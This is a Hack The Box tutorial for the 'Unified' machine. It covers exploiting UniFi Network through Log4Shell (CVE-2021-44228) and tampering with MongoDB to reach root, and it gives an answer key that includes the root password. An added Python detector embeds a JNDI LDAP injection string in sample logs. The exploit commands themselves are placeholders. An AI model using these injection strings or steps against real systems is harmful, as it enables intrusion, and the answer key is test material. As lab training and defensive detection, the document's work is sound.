HTB – Hack The Box – Tier 2 – Challenge 4 – Unified

Advanced Penetration Testing: Solving HTB Tier 2 – Challenge 4 ‘Unified’

Welcome to our advanced tutorial in the “HTB – Hack the Box Series” on solving Tier 2 – Challenge 4, ‘Unified’. This guide is part of our ongoing series, aiming to equip you with the skills for sophisticated penetration testing. Explore more challenges at: HTB – Hack the Box Series.

System Preparation: Ensuring Kali Linux is Up-to-Date

Start by updating Kali Linux, ensuring all tools are current for optimal performance:

$ sudo apt update && sudo apt full-upgrade -y

Establishing a Secure Connection

Establish a VPN connection to reach the HTB lab network securely:

$ sudo openvpn Downloads/starting_point_UserName.ovpn

Detailed Reconnaissance

Engage in comprehensive reconnaissance using Nmap to identify open ports and running services on the target IP:

$ nmap -sC -sV -p- 10.129.67.151

Exploiting Identified Vulnerabilities

Identify and exploit vulnerabilities based on open ports and service information. Utilize CVE-2021-44228 for exploiting Unifi Network services:

$ [exploitation commands and procedures]

Database Manipulation and User Access

Exploit MongoDB to manipulate user credentials. Use techniques for database access and modification, ensuring comprehensive control over the system:

$ [database manipulation commands]

Securing Administrative Access

Gain root access through SSH using the credentials obtained, and retrieve both user and root flags as proof of successful exploitation:

$ ssh [email protected]

Questions:

  1. Which are the first four open ports? – 22,8080,6789,8443
  2. What is the title of the software that is running on port 8443? – Unifi Network
  3. What is the version of the software that is running? – 6.4.54
  4. What is the CVE for the identified vulnerability? – CVE-2021-44228
  5. What protocol does JNDI leverage in the injection? – ldap
  6. What tool do we use to intercept the traffic, indicating the attack was successful? – tcpdump
  7. What port do we need to inspect intercepted traffic for? – 389 (default ldap port)
  8. What port is the MongoDB service running on? – 27117
  9. What is the default database name for UniFi applications? – ace
  10. What is the function we use to enumerate users within the database in MongoDB? – db.admin.find()
  11. What is the function we use to update users within the database in MongoDB? – db.admin.update()
  12. What is the password for the root user? – NotACrackablePassword4U2022
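
Seen from the defender's side, answers 5 to 7 describe two observable events: a JNDI lookup with an ldap URL arriving in a request, then a connection from the controller to port 389. The following is an added example, not part of the original walkthrough, that correlates the two; the log formats, request path, field name and addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# JNDI lookup carrying an LDAP(S) URL, the protocol named in answer 5.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?://[^}\s]+)\}", re.IGNORECASE)

# Constructed sample data; addresses, paths and formats are assumptions.
CONTROLLER_IP = "10.0.0.5"
REQUEST_LOG = [
    '2024-01-01T10:00:01Z POST /login field="${jndi:ldap://203.0.113.9:389/a}"',
    '2024-01-01T10:05:00Z POST /login field="${jndi:ldap://198.51.100.7/a}"',
    '2024-01-01T10:06:00Z POST /login field="alice"',
]
FLOW_LOG = [  # timestamp, source, destination, destination port
    "2024-01-01T10:00:02Z 10.0.0.5 203.0.113.9 389",
    "2024-01-01T10:00:03Z 10.0.0.5 192.0.2.10 443",
]


def find_lookups(lines):
    """Return (timestamp, host, port) for every JNDI LDAP lookup in the request log."""
    hits = []
    for line in lines:
        ts = line.split(" ", 1)[0]
        for match in JNDI_RE.finditer(line):
            try:
                url = urlsplit(match.group(1))
                port = url.port or (636 if url.scheme == "ldaps" else 389)
            except ValueError:  # malformed URL or port: still worth flagging
                hits.append((ts, None, None))
                continue
            hits.append((ts, url.hostname, port))
    return hits


def parse_flows(lines):
    """Parse 'ts src dst dport' records into tuples with an integer port."""
    return [(ts, src, dst, int(port)) for ts, src, dst, port in map(str.split, lines)]


def correlate(lookups, flows, controller_ip):
    """Label a lookup 'callback' if the controller later connected to its host:port."""
    out = []
    for ts, host, port in lookups:
        # ISO 8601 UTC timestamps in one format compare correctly as strings.
        called = any(src == controller_ip and dst == host and dport == port and fts >= ts
                     for fts, src, dst, dport in flows)
        out.append((ts, host, port, "callback" if called else "attempt"))
    return out
```

A row labelled "callback" means the controller evaluated the lookup and reached out, which is the same signal the tcpdump capture on port 389 gives in the walkthrough; "attempt" means the string was received but no matching egress was recorded.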

Useful Links:

  • https://unified.htb:8443/manage/account/login?redirect=%2Fmanage
  • https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi
  • https://github.com/puzzlepeaches/Log4jUnifi
  • https://github.com/veracode-research/rogue-jndi
  • https://erikdekker.net/
  • https://gbe0.com/posts/networking/ubiquiti/ubiquiti-unifi-controller-mongodb-issues/
  • https://www.hackthebox.com/achievement/machine/303878/441

Final Submission and Ethical Considerations

Upon successful completion, submit the flags as required by the HTB platform. Remember, this tutorial is for educational purposes, adhering to ethical hacking standards and legal boundaries.

Through this tutorial, you’ve not only solved the challenge but also honed your skills in advanced penetration testing. We encourage you to continue exploring the HTB platform, applying your knowledge responsibly and ethically.

Cogeanu Marius